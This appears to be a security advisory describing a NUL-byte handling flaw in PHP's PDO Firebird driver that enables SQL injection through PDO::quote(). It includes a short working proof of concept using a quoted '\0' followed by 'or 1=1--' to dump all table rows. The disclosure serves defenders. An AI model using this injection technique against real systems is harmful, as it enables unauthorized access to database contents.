Improper handling of NUL bytes during the preparation of Firebird SQL queries leads to sections of the of the query being dropped. NUL bytes can find their way into queries even under regular circumstances via PDO::quote().
A new query is constructed token-by-token. In the case of a ttString '\0', the string is copied via strncat() rather than memcpy(), stopping after the first ' quote and ignoring both the \0 and terminating ' quote. This will incorrectly embed the SQL tokens following the string into the string, allowing for trivial SQL injection if the next string is also attacker-controlled.
$dbh->exec('CREATE TABLE users (name VARCHAR(255))');
$dbh->exec("INSERT INTO users VALUES ('Foo')");
$dbh->exec("INSERT INTO users VALUES ('Bar')");
$param = $dbh->quote("\0");
$param2 = $dbh->quote('or 1=1--');
$stmt = $dbh->query("SELECT * FROM users WHERE name = {$param} AND name = {$param2}");
// Before preparation:
// SELECT * FROM users WHERE name = '\0' AND name = 'or 1=1--'
// After preparation:
// SELECT * FROM users WHERE name = ' AND name = 'or 1=1--'
echo json_encode($stmt->fetchAll(PDO::FETCH_ASSOC)) . "\n";
// [{"NAME":"Foo"},{"NAME":"Bar"}]
This incorrect preparation applies to SELECT, INSERT, UPDATE, DELETE, MERGE, WITH and EXECUTE statements.
Credits
Aleksey Solovev, Nikita Sveshnikov (Positive Technologies)